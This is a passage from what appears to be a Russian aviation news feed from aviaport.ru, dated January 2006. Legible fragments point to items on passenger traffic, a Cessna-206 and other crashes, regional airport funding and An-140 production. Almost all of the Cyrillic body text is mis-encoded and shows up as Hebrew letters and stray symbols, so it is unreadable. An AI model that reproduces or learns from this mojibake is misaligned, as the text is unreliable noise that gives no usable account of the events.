כס׀¨ו¨כץ·µ ״ דד י·בײכ דײדו כ·׀ײ 164,5 וסד (״ב·בײדו װ  2,2%).וײ ֶ ד ¨וד כװחוב¨װװ·µ  כ· ׀·װ·½, 1-21 ¦¨ֶ ¢ב ¨ב¨ף  קבײ״ײבו ·ׂ¨װ· £¨װ-­חב·ײװ  ״בײץ׀· ״ב·ׂ¨בװײ 20,1 וסד ״ דד י·בײכ, וײ װ  1,7% כסץ¨  װ ׀ײ¬·װײ¬ײ ״ײֶ ף ו¨׀ כ ״ב¨¦ס¦חש¨ׂ ¬ײ¦ח. §כ·י¨װ·¨ ד ׂײ׀¨וײכ װ  כװחוב¨װװ·µ  כ· ׀·װ·µ דײדו כ·׀ײ 428 כף׀¨וײכ · ״ײד ¦ײֶ (״ב·בײדו כ ב ףׂ¨ב¨ 3,6%). - - - - - §׀ וחץ¨װ· ״ײי בײכ כ הצ¡ ״ב·כ׀¨¨װס כ¨בוײ׀¨וס ױ ₪·ײװ ׀םװײ½ ¬כ ב¦·· - http://www.aviaport.ru/news/2006/01/02/99276.html - ל ב¦¨ ץו וײכ הצ¡ ¢חץחו ׀¨דװס¨ ״ײי בס. §׀ ׀·ֶכ·¦ ₪·· ״ײי בײכ ף ¦¨½דוכחוד כ¨בוײ׀¨וס ױ ₪·ײװ ׀םװײ½ ¬כ ב¦·· ץו ו  ז¨µ ד - Mon, 02 Jan 2006 13:28:00 +0300 - ל ב¦¨ ץו וײכ הצ¡ ¢חץחו ׀¨דװס¨ ״ײי בס, דײײ¢ש·׀· ״ב¨¦דו כ·ו¨׀· ״ײי בװײ½ ד׀חי¢ס דוב װס. ז ֶ, ײ ¬· כײף¬ײב װ·½ ף ב¨¬·דוב·בײכ װס כ ץו ו µ ׳ֶ׀ µײׂ , ז¨µ ד · ױם-׃¨ֶד·ֶײ. ב· קוײׂ ״׀ײש ¦ם ײו¦¨׀םװסµ ״ײי בײכ װ  ¬ב װ·₪¨ ז¨µ ד · ױם-׃¨ֶד·ֶײ ¦ײדו·¬ ¨ו 20 וסד. ¬ . §׀ ׀·ֶכ·¦ ₪·· ״ײי בײכ ף ¦¨½דוכחוד כ¨בוײ׀¨וס ױ ₪·ײװ ׀םװײ½ ¬כ ב¦·· ץו ו  ז¨µ ד. ׳דװײכװסׂ· ״ב··װ ׂ· ׀¨דװסµ ״ײי בײכ, ״בײ¦ײ׀י ש·µד ד ֶײװ₪  ¦¨ֶ ¢ב 2005 ¬. כ ב¦¨ ¬ײ-ף ״ ¦װסµ ב ½ײװ µ הצ¡, כ׀וד ף דחµ ,  װײׂ ׀םװײ כסדײֶ  ¦׀ קוײ¬ײ כב¨ׂ¨װ· ¬ײ¦  ו¨ׂ״¨ב וחב  כײף¦חµ  · ד·׀םװס½ כ¨ו¨ב, ״¨ב¨¦ ¨ו ¡ג. - - - - - ױ  ¢ײבוח ×ב װ₪חףדֶײ¬ײ ד ׂײ׀¨ו  י¨װש·װ  בײ¦·׀  ב¨¢¨װֶ  - http://www.aviaport.ru/news/2006/01/02/99275.html - ױ  ¢ײבוח ״ דד י·בדֶײ¬ײ ד ׂײ׀¨ו   כ· ֶײׂ״ װ·· Air Austral, ׀¨ו¨כץ¨¬ײ ·ף «ב װ₪·· װ  ײדובײכ ג¨װםײװ, י¨װש·װ  בײ¦·׀  ב¨¢¨װֶ  - Mon, 02 Jan 2006 13:25:00 +0300 - ױ  ¢ײבוח ״ דד י·בדֶײ¬ײ ד ׂײ׀¨ו   כ· ֶײׂ״ װ·· Air Austral, ׀¨ו¨כץ¨¬ײ ·ף «ב װ₪·· װ  ײדובײכ ג¨װםײװ, י¨װש·װ  בײ¦·׀  ב¨¢¨װֶ . ׃ ׀ם·ֶ  װ ףכ ׀· ¡׀ם-« ¨¦.רוײ ״בײ·ףײץ׀ײ ¨ש¨ כ דח¢¢ײוח. ײד׀¨ כס׀¨ו  ·ף ׁ·ײװ  דו ב¦¨דד  ף ׂ¨ו·׀ , וײ י¨װש·װ  ד׀·ץֶײׂ ¦ײ׀¬ײ ד·¦·ו כ וח ׀¨ו¨. ׳װ  ״ײׂײ¬׀  ״ב·װום בײ¦ס,   װ µײ¦·כץ·½ד װ  ¢ײבוח כב  ״¨ב¨ב¨ף ׀ ״ח״ײכ·װח.ה ׂ ״ײ׀¨ו ״בײ¦ײ׀י ׀ד ״ום  דײכ.ײ ״ב כ·׀ ׂ  כ· ״¨ב¨כײףײֶ, י¨װש·װס ד ¢¨ב¨ׂ¨װװײדום ¢ײ׀¨¨ ד¨ׂ· ׂ¨ד₪¨כ ֶ ״ײ׀¨וח װ¨ ¦ײ״חדֶ וד. הײובח¦װ·ֶ·  כ· ֶײׂ״ װ·· חוכ¨בי¦ ו, וײ ¢¨ב¨ׂ¨װװײדו· ח קוײ½ י¨װש·װס װ¨ ¢ס׀ײ כ·¦װײ. - - - - - ױ  כײדוײֶ¨ ¡כדוב ׀·· װ¨¢ײ׀םץײ½ ד ׂײ׀¨ו ח״ ׀ כ כײ¦ײ¨ׂ - http://www.aviaport.ru/news/2006/01/02/99274.html - ױ  כײדוײֶ¨ ¡כדוב ׀·· ח״ ׀ כ כײ¦ח װ¨¢ײ׀םץײ½ ײ¦װײׂײוײבװס½ ד ׂײ׀¨ו, ״ײ׀·₪· ״ײ¦וכ¨ב¦·׀  ¬·¢¨׀ם ״ו· ¨׀ײכ¨ֶ. ױ  ¢ײבוח ד ׂײ׀¨ו  Cessna-206 װ µײ¦·׀·דם ד¨ׂם ¨׀ײכ¨ֶ - Mon, 02 Jan 2006 13:24:00 +0300 - ױ  כײדוײֶ¨ ¡כדוב ׀·· ח״ ׀ כ כײ¦ח װ¨¢ײ׀םץײ½ ײ¦װײׂײוײבװס½ ד ׂײ׀¨ו, ״ײ׀·₪· ״ײ¦וכ¨ב¦·׀  ¬·¢¨׀ם ״ו· ¨׀ײכ¨ֶ, דײײ¢ש ¨ו  ¬¨װודוכײ ¡דדײץ·ק½ו¨¦ ב¨דד.ײ ¦ װװסׂ ״ײ׀·₪·· ץו ו  ַכ·װד׀¨װ¦, ¬¦¨ · ״בײ·ףײץ¨׀ ·װ₪·¦¨װו, װ  ¢ײבוח ד ׂײ׀¨ו  Cessna-206 װ µײ¦·׀·דם ד¨ׂם ¨׀ײכ¨ֶ - ץ¨דום ״ דד י·בײכ-״ ב ץו·דוײכ · ״·׀ײו. §כ  ¨׀ײכ¨ֶ  כסי·׀·, ײװ· ¬ײד״·ו ׀·ף·בײכ װס, דײײ¢ש ¨ו ״ײ׀·₪·.ג װ¨¨ דײײ¢ש ׀ײדם ײ¢ ײ¦װײׂ ״ײ¬·¢ץ¨ׂ.ה ׂײ׀¨ו ח״ ׀ כ כײ¦ײ¨ׂ װ¨¦ ׀¨ֶײ ײו ¬ײבײ¦  ¸״דח· װ  כײדוײֶ¨ ץו ו  דב ףח י¨ ״ײד׀¨ כף׀¨ו . ב··װס ״בײ·דץ¨¦ץ¨¬ײ כסדװוד. - - - - - ַ ׀·×ײבװ·: ¦כ  ¨׀ײכ¨ֶ  ״ײ¬·¢׀· כ ב¨ףח׀םו ו¨  כ· ֶ ו דובײ×ס - http://www.aviaport.ru/news/2006/01/02/99273.html - ל ב¨ףח׀םו ו¨ ֶבחץ¨װ· כ הצ¡, ץו ו ¡½¦ µײ,  דוװײ¬ײ ב¨ ֶו·כװײ¬ײ ד ׂײ׀¨ו  ״ײ¬·¢׀· ¦כ  ¨׀ײכ¨ֶ , װ µײ¦·כץ·µד װ  ¨¬ײ ¢ײבוח - Mon, 02 Jan 2006 13:23:00 +0300 - County דײײ¢ש·׀ יחבװ ׀·דו ׂ ײ וײׂ, וײ כ ׂ·װחכץח ״וװ·₪ח כ ב¨ףח׀םו ו¨ ֶבחץ¨װ·  דוװײ¬ײ ב¨ ֶו·כװײ¬ײ ד ׂײ׀¨ו  ״ײ¬·¢׀· ¦כ  ¨׀ײכ¨ֶ , װ µײ¦·כץ·µד װ  ¨¬ײ ¢ײבוח. צ¨ב·× חוײװ·׀, וײ ֶ ו דובײ×  ״בײ·ףײץ׀  כ 15 ֶ·׀ײׂ¨וב µ ֶ ¬ח ײו ׂ¨דוװײ¬ײ  קבײ״ײבו  זב ֶ·, כ 14:00 כ ״וװ·₪ח.ה׀חי¢ס  קבײ״ײבו  ״ײ¦וכ¨ב¦·׀·, וײ ד ׂײ׀¨ו  דוװײ½ ֶײׂ״ װ··, װ  ¢ײבוח ֶײוײבײ¬ײ װ µײ¦·׀·דם, ״ײ ב ףװײ½ ·װ×ײבׂ ₪··, ץ¨דום ·׀· כײד¨ׂם ¨׀ײכ¨ֶ, װ ״ב כ׀׀ד כ  קבײ״ײבו זב ֶ· ·ף זכ·װ-«ײ׀׀ף, ץו ו ¡½¦ µײ. ײ װ¨כסדװ¨װװסׂ ״ײֶ  ״ב··װ ׂ, ׂ ץ·װ  ב¨ףֶײ ·ףׂ¨װ·׀  ֶחבד,   ף ו¨ׂ דכףם ד װ¨½ ״בײ״ ׀  ײֶײװ ו¨׀םװײ.ױ ״ב כ׀¨װװס¨ װ  ׂ¨דוײ ״ײד׀¨¦װ¨¬ײ ב ¦·ײד·¬װ ׀  ד״ ד ו¨׀· ײ¢װ בחי·׀· ¬ײבש·¨ ײ¢׀ײֶׂ· ד ׂײ׀¨ו . ײֶ  װ¨ו וײװײ½ ·װ×ײבׂ ₪·· ײ וײׂ, וײ ״בײ·ףײץ׀ײ ד ײדו ׀םװסׂ· ׀¨װ ׂ· קֶ·״ י , · ״ דד י·ב ׂ·, װ µײ¦·כץ·ׂ·ד װ  ¢ײבוח ד ׂײ׀¨ו . ל װ דוײש¨¨ כב¨ׂ ״ײ ¦ װװײׂח ¦¨׀ח כ¨¦¨וד ב דד׀¨¦ײכ װ·¨. - - - - - ·װ·ום ד ׂײ׀¨וס ב ףב¨ץ·׀· כד¨ׂ י¨׀ ש·ׂ - http://www.aviaport.ru/news/2006/01/02/99272.html - ה 1 װכ ב 2006 ¬ײ¦  כ גײדד·· כדוח״·׀ כ ד·׀ח ף ֶײװ, ײוׂ¨װש·½ ײ¢ף ו¨׀םװײ¨ ׀·₪¨װף·בײכ װ·¨ 50 כ·¦ײכ ״ב¨¦״ב·װ·ׂ ו¨׀םדֶײ½ ¦¨ו¨׀םװײדו· - Mon, 02 Jan 2006 13:22:00 +0300 - ה 1 װכ ב 2006 ¬ײ¦  כ גײדד·· כדוח״·׀ כ ד·׀ח ף ֶײװ, ײוׂ¨װש·½ ײ¢ף ו¨׀םװײ¨ ׀·₪¨װף·בײכ װ·¨ 50 כ·¦ײכ ״ב¨¦״ב·װ·ׂ ו¨׀םדֶײ½ ¦¨ו¨׀םװײדו·, דײײ¢ש ¨ו ג¸¡ "ױײכײדו·". רוײו י¨ ף ֶײװ ¦¨׀ ¨ו ײ¢ף ו¨׀םװסׂ ׀·₪¨װף·בײכ װ·¨ װ¨דֶײ׀םֶ·µ כ·¦ײכ ¦¨ו¨׀םװײדו·, ¦׀ ֶײוײבסµ ב װ¨¨ ד״¨₪· ׀םװסµ ב ףב¨ץ¨װ·½ װ¨ וב¨¢ײכ ׀ײדם. ל  דוװײדו· - ·¬ײבװײ¬ײ ¢·ףװ¨ד .הײ¬׀ דװײ כדוח״·כץ¨ׂח כ ד·׀ח ¦ײֶחׂ¨װוח, ו¨״¨בם װ¨ װחיװײ ״ײ׀ח ום ׀·₪¨װף· ״ב¨¦״ב·װ·ׂ ו¨׀ׂ, ײֶ ףסכ ש·ׂ חד׀ח¬· כ דרב¨ וחב·ףׂ . ז ֶי¨ ׀·₪¨װף· װ¨ ״ײװ ¦ײ¢·וד ¦׀ ״¨ב¨כײףֶ· ״ דד י·בײכ ׀¨¬ֶײכסׂ  כוײוב װד״ײבוײׂ, ״בײ·ףכײ¦דוכ  ו ¢ װסµ ·ף¦¨׀·½, ו¨µװ·¨דֶײ¬ײ ײ¢ד׀חי·כ װ· כײף¦חץװסµ דח¦ײכ, קֶד״׀ח ו ₪·· װ¨×ו¨¦ײ¢סכ ש·µ ״בײ·ףכײ¦דוכ · וב װד״ײבו  װ¨×ו· · ¬ ף .ױ¨ײ¢µײ¦·ׂײדום ״ײ׀ח¨װ· ׀·₪¨װף·½ װ  ײ¦װ· כ·¦ס ¦¨ו¨׀םװײדו· ײוׂ¨װ¨וד ד 1 װכ ב 2006 ¬ײ¦ , װ  ¦בח¬·¨ - ד 1 װכ ב 2007 ¬ײ¦ ,   ¦׀ ײדו ׀םװסµ כ·¦ײכ ״ב¨¦״ב·װ·ׂ ו¨׀םדֶײ½ ¦¨ו¨׀םװײדו· - וײ׀םֶײ ״ײד׀¨ כדוח״׀¨װ· כ ד·׀ח דײײוכ¨ודוכחש·µ ו¨µװ·¨דֶ·µ ב¨¬׀ ׂ¨װוײכ.ז ֶי¨ ף ֶײװ ח״בײש ¨ו ״ײ׀ח¨װ· ׀·₪¨װף·½ · חוײװ¨ו ״ײ׀װײׂײ· דײײוכ¨ודוכחש·µ ר¦¨ב ׀םװסµ ײב¬ װײכ כ׀ דו·. - - - - - «¨¦ײבײכֶ¨ ״ײ¦¢¨בחו ״ײ¦ב¦·ֶ  - http://www.aviaport.ru/news/2006/01/02/99271.html - ·װײכװ·ֶ· ״ב כ·ו¨׀םדוכ  ׳ׂדֶײ½ ײ¢׀ דו· װ ףײכחו ¬¨װ¨ב ׀םװײ¬ײ ״ײ¦ב¦·ֶ  דובײ·ו¨׀םדוכ  װײכײ¬ײ  קבײ״ײבו  ׳ׂדֶ-«¨¦ײבײכֶ  - Mon, 02 Jan 2006 13:08:00 +0300 - ַ ֶ דו ׀ײ ·ףכ¨דוװײ "", ד¨¬ײ¦װ ·װײכװ·ֶ· ״ב כ·ו¨׀םדוכ  ׳ׂדֶײ½ ײ¢׀ דו· װ ףײכחו ¬¨װ¨ב ׀םװײ¬ײ ״ײ¦ב¦·ֶ  דובײ·ו¨׀םדוכ  װײכײ¬ײ  קבײ״ײבו  ׳ׂדֶ-«¨¦ײבײכֶ . ױײכס¨ כײף¦חץװס¨ כײבײו  ׳ׂדֶ , װ  ף כ¨בץ¨װ·¨ דובײ·ו¨׀םדוכ  ֶײוײבסµ ״ײוב¨¢ח¨וד ¢ײ׀¨¨ 5 ׂ׀ב¦ בח¢., ¢ח¦חו ככ¨¦¨װס כ קֶד״׀ח ו ₪· חי¨ כ 2008 ¬ײ¦ח. פ  ״ײ׀ח¨װ·¨ ¬¨װ¨ב ׀םװײ¬ײ ״ײ¦ב¦ , דוײ·ׂײדום ֶײוײבײ¬ײ וײ׀םֶײ כ ד׀¨¦חש¨ׂ ¬ײ¦ח ״ב¨כסד·ו 1 ׂ׀ב¦ בח¢., ״ײד״ײבו ײׂדֶ·¨ דובײ·ו¨׀םװס¨ ֶײׂ״ װ·· ׳׳׳ "ה« "ײ׀¨ו · ַ" · ׳׳׳ "ױ׳ "׃ײדוײכ·ֶ",  ו ֶי¨ וׂ¨װדֶ  פ¡׳ "¡קבײ¦בײׂ¦ײבדובײ½".­¨װ¨ב ׀םװײ¬ײ ״ײ¦ב¦·ֶ  דובײ·ו¨׀םדוכ   קבײ״ײבו  ׳ׂדֶ-«¨¦ײבײכֶ  ד״¨₪· ׀םװ  ֶײװֶחבדװ  ֶײׂ·דד· ״ב כ·ו¨׀םדוכ  ב··בוסץם ײ״ב¨¦¨׀׀  כ¨ב  ¦ײ ״ײף¦װ¨¬ײ כ¨¨ב . "ל ו¨װ¦¨ב¨ ״ב·װ·ׂ ו ח דו·¨ ײׂדֶ·½ ×·׀· ׀ וׂ¨װדֶײ¬ײ פ¡׳ "¡קבײ¦בײׂ¦ײבדובײ½",   ו ֶי¨ ׂ¨דוװס¨ דובײ·ו¨׀םװס¨ ֶײׂ״ װ·· ׳׳׳ ה« "ײ׀¨ו · ַ", · ׳׳׳ ױ׳ "׃ײדוײכ·ֶ", - ב דדֶ ף ׀ װ  ׀םװ·ֶ ח״ב כ׀¨װ· ׂ·װ·דו¨בדוכ  ״בײׂסץ׀¨װװײ½ ״ײ׀·ו·ֶ·, וב װד״ײבו  · דכף· ״ב כ·ו¨׀םדוכ  ׳ׂדֶײ½ ײ¢׀ דו· ¡׀¨ֶד װ¦ב חץֶ ב¨כ. ײ ¨¬ײ ד׀ײכ ׂ, ״ב¨ו¨װ¦¨װוס װ  ״ײ׀ח¨װ·¨ ¬¨װ¨ב ׀םװײ¬ײ ״ײ¦ב¦  ¦ײ׀יװס ¢ס׀· ¦ײֶ ף ום, וײ ײ¢׀ ¦ ו כד¨ׂ· װ¨ײ¢µײ¦·ׂסׂ· ֶ ¦בײכסׂ· · ו¨µװ·¨דֶ·ׂ· כײףׂײיװײדוׂ· ¦׀ כ¨¦¨װ· דוײ׀ם ׂ דץו ¢װײ½ דובײ½ֶ·.ױ ״ײׂװ·ׂ, ײ¢  ֶו·כװײׂ ח דו·· ײ¢׀ דוװסµ כ׀ דו¨½ כ דובײ·ו¨׀םדוכ¨ װײכײ¬ײ  קבײ״ײבו  ¬ח¢¨בװ וײב ׁ¨ײװ·¦ ײ׀¨י ¨כ ף כ·׀ 8 ¦¨ֶ ¢ב ו¨ֶחש¨¬ײ ¬ײ¦  װ  ף ד¨¦ װ··  בµ·ו¨ֶוחבװײ-¬ב ¦ײדובײ·ו¨׀םװײ¬ײ דײכ¨ו  ב¨¬·ײװ . "7 װײ¢ב 2008 ¬ײ¦  ׂס כף׀¨ו·ׂ ד  קבײ״ײבו  «¨¦ײבײכֶ . ױחיװײ דו כ·ום ״¨ב¨¦ דײ¢ײ½ ד¨בם¨ףװס¨ ף ¦ ·", - ״ײײ¢¨ש ׀ וײ¬¦  ¬ח¢¨בװ וײב.ױ  דובײ·ו¨׀םדוכײ װײכײ¬ײ  קבײ״ײבו  ֶ ףװ  ב··בוסץם כ ¢ח¦חש¨ׂ ¬ײ¦ח ״ײוב ו·ו 1 ׂ׀ב¦ בח¢. ַ ֶ דײײ¢ש·׀ ·. ײ. ׂ·װ·דוב  ×·װ װדײכ ׳ׂדֶײ½ ײ¢׀ דו· ׃·µ ·׀ ך¦ װײכ, ב דµײ¦ס װ  כײףכ¨¦¨װ·¨  קבײ״ײבו  ״ײֶ  װ¨ ף ׀ײי¨װס ײו¦¨׀םװײ½ דובײֶײ½ כ ¢¦י¨ו¨ ב··בוסץם װ  2006 ¬ײ¦. "רו  דו ום ¢ח¦¨ו ״בײ×·װ װד·בײכ װ  ף  ד¨ו ¦ײ״ײ׀װ·ו¨׀םװסµ ¦ײµײ¦ײכ ֶ ףװס ·׀· ״¨ב¨ב ד״ב¨¦¨׀¨װ·  דו· ב דµײ¦ײכ װ  װ¨״ב·ײב·ו¨וװס¨ ף ¦ ·", - דײײ¢ש·׀ ¬ײד״ײ¦·װ ך¦ װײכ.לײףכ¨¦¨װ·¨ כ ׳ׂדֶ¨  קבײ״ײבו  «¨¦ײבײכֶ  װ  ׀ײדם כ 1982 ¬ײ¦ח. ה¦   ײ¢¨ֶו  כ דובײ½ ¢ס׀  ף ״׀ װ·בײכ װ  װ  1993 ¬ײ¦. ׳¦װ ֶײ ×·װ װד·בײכ װ·¨ דובײ·ו¨׀םדוכ  ¢ס׀ײ ״ב¨ֶב ש¨װײ כ װ  ׀¨ 90-µ ¬ײ¦ײכ, ֶ קוײׂח כב¨ׂ¨װ· כף׀¨וװײ-״ײד ¦ײװ  ״ײ׀ײד  · ײ¢¨ֶוס ·װ×ב דובחֶוחבס ¢ס׀· ¬ײוײכס װ  65%. ל װ דוײש·½ ׂײׂ¨װו װ¨¦ײדובײ¨װװס½  קבײ״ײבו ב ד״ײ׀ ¬ ¨ו כף׀¨וװײ½ ״ײ׀ײדײ½ ¦׀·װײ½ 2930 ׂ · ֶײו¨׀םװײ½ ׂײשװײדום 54 ׃לו. ַ  קבײ״ײבוח ״ײ¦כ¨¦¨װ כײ¦ײכײ¦, ק׀¨ֶובײד¨ו·, ¬ ףײ״בײכײ¦ · י¨׀¨ףװײ¦ײבײיװ  ׂ ¬·דוב ׀ם.«·װ װד·בײכ װ·¨ דובײ·ו¨׀םדוכ  װ װ¨וד ״ײד׀¨ וײ¬ײ, ֶ ֶ ·װײכװ·ֶ· ב¨ץ ו כײ״בײד ד ״¨ב¨כײ¦ײׂ «¨¦ײבײכֶ· כ ב¨¬·ײװ ׀םװח דײ¢דוכ¨װװײדום. "ה¨½ ד ׂס חי¨ ײ¢ב ו·׀·דם כ בײדד·½דֶײ¨  ¬¨װודוכײ "גײד·ׂחש¨דוכײ". ¸ ״ײֶ  קו  ״בײ₪¨¦חב  (״¨ב¨¦   כ דײ¢דוכ¨װװײדום ב¨¬·ײװ . - "") װ¨ ¢ח¦¨ו ״בײכ¨¦¨װ , ֶ דובײ·ו¨׀םדוכח  קבײ״ײבו  ׂס ״ב·דוח״ ום װ¨ ¢ח¦¨ׂ. ׃ס װ¨ דײׂװ¨כ ¨ׂד, וײ כד¨ װ¨ײ¢µײ¦·ׂס¨ ¢חׂ ¬· ¢ח¦חו ײ×ײבׂ׀¨װס כ ״¨בכײׂ ֶכ בו ׀¨ ד׀¨¦חש¨¬ײ ¬ײ¦ ", - ״ײ¦¨׀·׀ד ״בײ¬װײףײׂ ¡׀¨ֶד װ¦ב חץֶ ב¨כ. ײ ¨¬ײ ¦ װװסׂ, דײכײֶח״װס¨ ף וב וס ״ײ ף כ¨בץ¨װ· דובײ·ו¨׀םדוכ  װײכײ¬ײ ײׂדֶײ¬ײ  קבײ״ײבו  דײדו כו ¢ײ׀¨¨ 5 ׂ׀ב¦ בח¢. ײ ד׀ײכ ׂ ·. ײ. ¬¨װ¨ב ׀םװײ¬ײ ¦·ב¨ֶוײב  ׳¡׳ "׳ׂדֶ-«¨¦ײבײכֶ " ל ׀¨ב· ײ״ײכ , ¦ײ 65% ײו ײ¢ש¨¬ײ ײ¢¨ׂ  ×·װ װד·בײכ װ· כ ¢ח¦חש¨ׂ ¬ײ¦ח ¢ח¦¨ו װ ״ב כ׀¨װײ װ  ב¨ֶײװדובחֶ₪· כף׀¨וװײ-״ײד ¦ײװײ½ ״ײ׀ײדס. "ה¨½ ד װחיװײ ײ¢¨ד״¨·ום ¢¨ד״¨ב¨¢ײ½װײ¨ דװ ¢י¨װ·¨ דובײ·ו¨׀םװײ½ ״׀ײש ¦ֶ· כײ¦ײ½ · ק׀¨ֶוב·¨דוכײׂ, ״ײ¦¬ײוײכ·ום ׂ¨דו  ¦׀ ב ףׂ¨ש¨װ· ׀¦¨½ · ו¨µװ·ֶ·, וײ¢ס כ  ״ב¨׀¨ ׂײיװײ ¢ס׀ײ ״ב·דוח״·ום ֶ  ֶו·כװײׂח דובײ·ו¨׀םדוכח", - דײײ¢ש·׀ ¬ײד״ײ¦·װ ײ״ײכ.׳י·¦ ¨וד, וײ ב¨ףח׀םו וס ֶײװֶחבד  ״ײ ײ״ב¨¦¨׀¨װ· ¬¨װ¨ב ׀םװײ¬ײ ״ײ¦ב¦·ֶ  דובײ·ו¨׀םדוכ   קבײ״ײבו  ׳ׂדֶ-«¨¦ײבײכֶ  ·װײכװ·ֶ· ײ¢װ בײ¦חו ד¨¬ײ¦װ. - - - - - בײ·ףכײ¦·ו¨׀· ¡װ-140 דײ¬׀ דװס ד כסכײ¦ ׂ· ֶײׂ·דד·· - http://www.aviaport.ru/news/2006/01/02/99270.html - ב¨¦דו כ·ו¨׀· ¶­¡ ״ײ¦וכ¨ב¦·׀·, וײ דײ¬׀ דװס דײ כד¨ׂ· כסכײ¦ ׂ·, ֶ ֶײוײבסׂ ״ב·ץ׀  ֶײׂ·דד· ״ײ ב דד׀¨¦ײכ װ· ״ב··װ ֶ ו דובײ×ס ד ׂײ׀¨ו  ¡װ-140 - Mon, 02 Jan 2006 13:05:00 +0300 - ל¨ב  ״ב¨¦דו כ·ו¨׀· ¶ בםֶײכדֶײ¬ײ ¬ײדח¦ בדוכ¨װװײ¬ײ  כ· ₪·ײװװײ¬ײ ״בײ·ףכײ¦דוכ¨װװײ¬ײ ״ב¨¦״ב·ו· (¶­¡) ״ײ¦וכ¨ב¦·׀·, וײ דײ¬׀ דװס דײ כד¨ׂ· כסכײ¦ ׂ·, ֶ ֶײוײבסׂ ״ב·ץ׀  ֶײׂ·דד· ״ײ ב דד׀¨¦ײכ װ· ״ב··װ ֶ ו דובײ×ס ד ׂײ׀¨ו  ¡װ-140, כ ב ¢ײו¨ ֶײוײבײ½ ״ב·װ·ׂ ׀ ח דו·¨ ¶­¡. ײד׀¨ ײ¢װ בײ¦ײכ װ· ״¨בכסµ ב¨ףח׀םו וײכ ב דד׀¨¦ײכ װ· כ װ¨ֶײוײבסµ ה׃¸ ״ײכ·׀ דם ·װ×ײבׂ ₪· ײ וײׂ, וײ ״בײ·ףכײ¦·ו¨׀· ב ף¢·כץ¨¬ײד ד ׂײ׀¨ו  װ¨ ב ף¦¨׀ו ׂװ¨װ·¨ ֶײׂ·דד··. ל¨ב  קו  ·װ×ײבׂ ₪· ¢ס׀  ײ״בײכ¨ב¬װחו  ¦¨״ בו ׂ¨װוײׂ ״ײ דכףׂ ד ײ¢ש¨דוכ¨װװײדום ¶­¡.ַײׂ·דד·, כ דײדו כ ֶײוײבײ½ כײץ׀· ״ב¨¦דו כ·ו¨׀· ¡ױזַ ·ׂ. ¡װוײװײכ  (ב ףב ¢ײו·ֶ ד ׂײ׀¨ו ), פ ״ײבײידֶײ¬ײ ׂ ץ·װײדובײ·ו¨׀םװײ¬ײ ֶײװדובחֶוײבדֶײ¬ײ ¢בײ "בײ¬ב¨דד" (ב ףב ¢ײו·ֶ ¦כ·¬ ו¨׀), ¶­¡ · ף ״ײבײידֶײ½ ֶײׂ״ װ·· "׃ײוײב ה·" (״בײ·ףכײ¦·ו¨׀ם ¦כ·¬ ו¨׀¨½), ב דץ·×בײכ כ "¨בװס½ ש·ֶ" ״ב·ץ׀  ֶ כסכײ¦ח, וײ װ  כסדײו¨ 2100 ׂ ד ׂײ׀¨ו װ  ׀ דװ·י¨װ·¨ ״ײ ד״·ב ׀·, דײכ¨בץ·כ ¨וסב¨ כ·וֶ . ¨ב¨ף װ¨דֶײ׀םֶײ ד¨ֶחװ¦ דכףם ד קֶ·״ י¨ׂ ״בײ״ ׀ , ״ײד׀¨ ¨¬ײ ד ׂײ׀¨ו ·ד¨ף ד ב ¦ בײכ. ¨בכס¨ ב¨ףח׀םו וס ב דד׀¨¦ײכ װ· ״ײֶ ף ׀·, וײ ¦כ·¬ ו¨׀· ד ׂײ׀¨ו , ד·דו¨ׂס ח״ב כ׀¨װ· · קװ¨ב¬ײדװ ¢י¨װ· ¢ס׀· ·ד״ב כװס. ב··װײ½ ֶ ו דובײ×ס ׂײ¬׀  דו ום װ¨·ד״ב כװײדום  כ· ¬ײב·ףײװוײכ - ״ב·¢ײבײכ, ״ײֶ ףסכ ש·µ ״ײ׀ײי¨װ·¨ ד ׂײ׀¨ו  כ ״בײדוב װדוכ¨.ױ ״ײׂװ·ׂ, וײ 23 ¦¨ֶ ¢ב ״ײ¦ £ ֶח ״בײ·ףײץ׀ײ ֶבחץ¨װ·¨ ד ׂײ׀¨ו  µ בםֶײכדֶײ¬ײ ״בײ·ףכײ¦דוכ  ¡װ-140, כס״ײ׀װכץ¨¬ײ ב¨½ד £ ֶח - ¡ֶו ח. ל ב¨ףח׀םו ו¨ ֶ ו דובײ×ס ״ײ¬·¢׀· 23 ¨׀ײכ¨ֶ . ב כ·ו¨׀םדוכײ ¡ף¨ב¢ ½¦י װ  ״ב·ײדו װײכ·׀ײ קֶד״׀ח ו ₪· ד ׂײ׀¨וײכ ¡װ-140 ¦ײ ײֶײװ װ· ב דד׀¨¦ײכ װ· ״ב··װ ֶ ו דובײ×ס. - - - - - גײ¢·װףײװ "״ײװ¨כײ׀¨" - http://www.aviaport.ru/news/2006/01/02/99268.html - ך·ו¨׀ם ל¨׀·ֶײ¢ב·ו װ··, י¨׀ כץ·½ כדוב¨ו·ום ױײכס½ ¬ײ¦ כ ֶײׂ״ װ·· ¦בחף¨½ װ  ײדובײכ¨ ז¨װ¨ב¨×¨, ״ײ״ ׀ כ ף ובח¦װ·ו¨׀םװח ד·וח ₪·, דו כ "גײ¢·װףײװײׂ ״ײװ¨כײ׀¨" - Mon, 02 Jan 2006 13:03:00 +0300 - ך·ו¨׀ם ל¨׀·ֶײ¢ב·ו װ··, דוב דוװײ י¨׀ כץ·½ כדוב¨ו·ום ױײכס½ ¬ײ¦ כ ֶײׂ״ װ·· ¦בחף¨½ װ  ·ד״ װדֶײׂ ײדובײכ¨ ז¨װ¨ב¨×¨, ״ײ״ ׀ כ כ¨דםׂ  ף ובח¦װ·ו¨׀םװח ד·וח ₪·, דו כ ״¨ב¨¦ ״ב ף¦װ·ֶײׂ "גײ¢·װףײװײׂ ״ײװ¨כײ׀¨".ַײׂ װ¦·ב  כ· ׀ ½װ¨ב , ד׀¨¦ײכ כץ¨¬ײ ב¨½דײׂ ZB-558 װ  ז¨װ¨ב·×¨ ·ף ׃ װ¨דו¨ב , ״ב·װ׀ ב¨ץ¨װ·¨ דײכ¨בץ·ום װ¨ף ״׀ װ·בײכ װװח ״ײד ¦ֶח, וײ¢ס כסד ¦·ום ״¨ב¨״·כץ¨¬ײ כײ כב¨ׂ ב¨½ד  ״ דד י·ב . זײו װ  ׀ דֶכ¨בװײד׀ײכ·ום כ  ¦ב¨ד ״ דד י·בײכ · ֶײׂ װ¦ס, ״בײ·¬װײב·בײכ כ וב¨¢ײכ װ·¨ חד״ײֶײ·וםד. ל קוײו ׂײׂ¨װו ׀ ½װ¨ב, װ  ¢ײבוח ֶײוײבײ¬ײ װ µײ¦·׀·דם 210 ¨׀ײכ¨ֶ, ׀¨ו¨׀ װ  כסדײו¨ 